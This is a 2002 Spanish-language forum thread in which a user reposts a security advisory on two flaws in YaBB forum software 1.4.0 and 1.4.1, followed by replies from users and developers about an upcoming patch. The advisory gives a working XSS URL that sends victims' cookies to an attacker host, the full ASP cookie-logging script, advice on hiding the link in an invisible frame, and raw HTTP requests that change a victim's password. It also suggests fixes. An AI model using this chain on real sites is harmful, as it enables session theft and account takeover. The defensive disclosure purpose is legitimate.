Welcome, Guest. Please Login or Register.
April 28, 2025, 06:44:59 PM
Home Help Search Log in Register
News: If you are still using YaBB SE, please consider upgrading to SMF as soon as possible.

YaBB SE Community  |  Language Specific User Help  |  Español  |  VULNERABILIDADES EN LOS FOROS YABB 1.4.0 y 1.4.1!!! « previous next »
Pages: [1] Reply Ignore Print
Author Topic: VULNERABILIDADES EN LOS FOROS YABB 1.4.0 y 1.4.1!!!  (Read 817 times)
el-brujo
Jr. Member
**
Posts: 76


VULNERABILIDADES EN LOS FOROS YABB 1.4.0 y 1.4.1!!!
« on: October 19, 2002, 06:29:13 PM »
Reply with quote

__________________________________________
Two security vulnerabilities in YaBB allows stealing
users cookies and hijacking users accounts.

Tested on:
YaBB 1.40 & 1.41

Summary :
YaBB is a leading provider of free, downloadable php
forums for webmasters. Two security vulnerabilities in
the product allows a remote attacker to steal users cookies, hijacking users accounts, and more. The issues
discussed are :
1. Cross Site Scripting Vulnerability on the login
procedure.
2. Unsecured changing profile method.

*************** 1. Cross Site Scripting Vulnerability
on the login procedure ******************

If we log into YaBB forums and enter invalid
username/password, the forum displays the username and the password we entered, and it doesn't strip HTML tags from the password
field, allowing us to write malicious HTML and
JavaScript into the page.

>From now on, stealing the username cookie is pretty
easy. The method for this is creating a css
vulnerability in the target site, forcing him to send the cookie to an .asp file we have created. This can be done by this statement :
http://target.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.locatio

n.href(%22http://www.oursite.com/hack.asp?%22%2Bdocument.cookie)</script>

Sending the above url to someone can be suspicious to
him but we can build a site which have a invisible
frame to that url, which is alot more dangerous.

NOTE : the yabb doesnt allow us to use "=" or "%3d",
so we have to catch the cookie without a
request("data") statement in the asp file, because then we will need to put "data="
in the url.

Ok, now lets build the hack.asp file, to log the
cookie we are posting. The file should look like this
:
------------------------------- hack.asp
------------------------------------
<%
Option Explicit

Const ForWriting = 2
Const ForAppending = 8
Const Create = True

Dim MyFile
Dim FSO ' FileSystemObject
Dim TSO ' TextStreamObject
Dim Str
Str = Request.ServerVariables("QUERY_STRING")

MyFile = Server.MapPath("./db/log.txt")

Set FSO =
Server.CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.OpenTextFile(MyFile, ForAppending,
Create)

if (Str <> "") then TSO.WriteLine Str

TSO.close
Set TSO = Nothing
Set FSO = Nothing
%>
<HTML>
<BODY>
You have just been hacked.
</BODY>
</HTML>
----------------------------------- EOF
-----------------------------------

This file writes
Request.ServerVariables("QUERY_STRING"), which is the
whole path we are posting after the "?", into a log file.


************* 2. Unsecured changing profile method
***************

YaBB has a form to change users details. the original
password is not required when changing the password to
a new one,

meaning that if an attacker have someone else cookie,
he can change his password.

- Defines:
USERNAME - The username
USERNAME COOKIE- The username cookie.

- YaBB Cookie Explanation :
The cookie's format of YaBB is something like :
Cookie: YaBBusername=<USERNAME>;
YaBBpassword=ys6bPWmp44PXA;
expiretime=1034304354
After the attacker got the cookie, he can use the
cookie to change the user password. He can use the
cookie even if the

expiretime has passed by changing the cookie to the
following :
Cookie: YaBBusername=<USERNAME;
YaBBpassword=ys6bPWmp44PXA;
expiretime=9999999999

This one will always work.

- Exploiting the server and changing to a new password
:
First of all, if the attacker only want to change the
password and not the user details, he will have to get
them from the

server database and only then he will build his POST
request that will change the user's password. to do
that, he also have

to include the stolen cookie.

to find out the user details, he will send this
request to the server :

------------------------------------
GET
/forums/index.php?board=;action=profile;user=<USERNAME>
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,
application/vnd.ms-powerpoint,
application/vnd.ms-excel,
application/msword,
*/*
Accept-Language: en-us
Cookie: <USERNAME COOKIE>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.0)
Host: www.victim.com
Proxy-Connection: Keep-Alive
------------------------------------

Then the server will return a form with the <USERNAME>
details, and allow attacker to change it. Note that
the form doesn't ask the user to enter his previous password, and it doesn't check anything but the username and his cookie to see if it is the legitimate user. Now attacker is ready to build his main POST request to change the user's password

The POST request might look like this :

------------------------------------
POST /forums/index.php?board=;action=profile2 HTTP/1.1
Accept: application/vnd.ms-powerpoint,
application/vnd.ms-excel,
application/msword, image/gif, image/x-xbitmap,
image/jpeg,
image/pjpeg, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.0;
TUCOWS;
YComp 5.0.0.0)
Host: www.victim.com
Content-Length: 286
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: <USERNAME COOKIE>

userID=666&user=<USERNAME>&passwrd1=HaCkEd&passwrd2=HaCkEd&name=<USERNAME>&e
[email protected]&gender=&bday1=00&bday2=00&bday3=0000&location=&websi
tetitle=&websiteurl=&icq=3&aim=&msn=&yim=&usertext=&hideemail=on&usertimefor
mat=&usertimeoffset=0&signature=&secretQuestion=&secretAnswer=&moda=1
------------------------------------

All the details that the attacker set are values taken
from the form he got when he sent the GET request
first (note that userID is a hidden value).
You can see the "passwrd1" and "passwrd2" parameters
that attacker send to the server.
After sending the above POST request, the user's
password will be changed to "HaCkEd".

*************************************************************************

- Possible Solution:
For the CSS Problem : Dont show the invalid
username/password, or at least strip HTML tags from
the password field

For the password changing problem :
1. YaBB can save the IP of each user, and check the IP
when someone asks to change his password. (Still not
unbreakable, but much harder to exploit).
2. YaBB can ask the user to enter also the previous
password before changing it to new one. In that way
the attacker won't be able to break the forum rotection by having only the user's cookie.
__________________________________________


A ver si sacais algún parche y tal.

Gracias anticipadas.
Logged
Jordi
Noobie
*
Posts: 11


No toques al gato sin guantes

WWW
Re:VULNERABILIDADES EN LOS FOROS YABB 1.4.0 y 1.4.1!!!
« Reply #1 on: October 19, 2002, 11:21:46 PM »
Reply with quote

Pues no sé si tendrá algo que ver con esto, pero hoy mismo me he encontrado cambiada mi posición de usuario, "Administrador", por "okay". Había sido cambiada desde mi perfil.  ???

En el foro principal en inglés está publicado este mismo tema y hay también disponible un arreglo para parte del problema.
« Last Edit: October 19, 2002, 11:59:36 PM by Jordi » Logged

Jordi Casanovas
Desde Barcelona, España
Omar Bazavilvazo
YaBB SE Developer
YaBB God
*****
Posts: 2153


I never said I would stay to the end...

WWW
Re:VULNERABILIDADES EN LOS FOROS YABB 1.4.0 y 1.4.1!!!
« Reply #2 on: October 20, 2002, 04:37:52 PM »
Reply with quote

YSE devs ya vieron ese problema

esta medio raro para que alguien te pueda robar tu cuenta, ya que necesitan tu cookie, y para que tengan tu cookie deben tener acceso a tu maquina.

De todos modos, va a salir un YSE 1.4.2, que arregla esos problemas de seguridad. No debe pasa mucho (1 semana yo creo) antes de que salga el patch :)

ja ne!
Logged

Greetings from México!
http://omarbazavilvazo.com
Mi foro Español-Japonés
http://hablajapones.org
http://hablajapones.org/index.php/japones/tutoriales/b16.php

NO me manden IM para soporte o dudas
...Leo los foros como todos...
Jordi
Noobie
*
Posts: 11


No toques al gato sin guantes

WWW
Re:VULNERABILIDADES EN LOS FOROS YABB 1.4.0 y 1.4.1!!!
« Reply #3 on: October 22, 2002, 03:40:30 PM »
Reply with quote

Esperemos ese patch. Pero estoy absolutamente seguro: nadie tiene acceso a mi computadora excepto yo mismo, nadie más que yo conoce el password, y alguien entró en mi cuenta y cambió mi perfil de "Administrador" por "okay". Sería una prueba, no sé, pero de que hackearon la cuenta no hay duda.
Logged

Jordi Casanovas
Desde Barcelona, España
Omar Bazavilvazo
YaBB SE Developer
YaBB God
*****
Posts: 2153


I never said I would stay to the end...

WWW
Re:VULNERABILIDADES EN LOS FOROS YABB 1.4.0 y 1.4.1!!!
« Reply #4 on: October 22, 2002, 03:53:37 PM »
Reply with quote

hmm...
pues ya mero sale ese patch de todos modos :P

esta raro lo de tu hackeada, pero bueno, todo es posible... te toco :(

ja ne!
Logged

Greetings from México!
http://omarbazavilvazo.com
Mi foro Español-Japonés
http://hablajapones.org
http://hablajapones.org/index.php/japones/tutoriales/b16.php

NO me manden IM para soporte o dudas
...Leo los foros como todos...
Omar Bazavilvazo
YaBB SE Developer
YaBB God
*****
Posts: 2153


I never said I would stay to the end...

WWW
Aqui esta:
« Reply #5 on: November 08, 2002, 05:49:49 PM »
Reply with quote

http://www.yabb.info/community/index.php?board=172;action=display;threadid=14569

ja ne!
Logged

Greetings from México!
http://omarbazavilvazo.com
Mi foro Español-Japonés
http://hablajapones.org
http://hablajapones.org/index.php/japones/tutoriales/b16.php

NO me manden IM para soporte o dudas
...Leo los foros como todos...
Pages: [1] Reply Ignore Print 
YaBB SE Community  |  Language Specific User Help  |  Español  |  VULNERABILIDADES EN LOS FOROS YABB 1.4.0 y 1.4.1!!! « previous - next »
 


Powered by MySQL Powered by PHP YaBB SE Community | Powered by YaBB SE
© 2001-2003, YaBB SE Dev Team. All Rights Reserved.
SMF 2.1.4 © 2023, Simple Machines
Valid XHTML 1.0! Valid CSS

Page created in 0.128 seconds with 19 queries.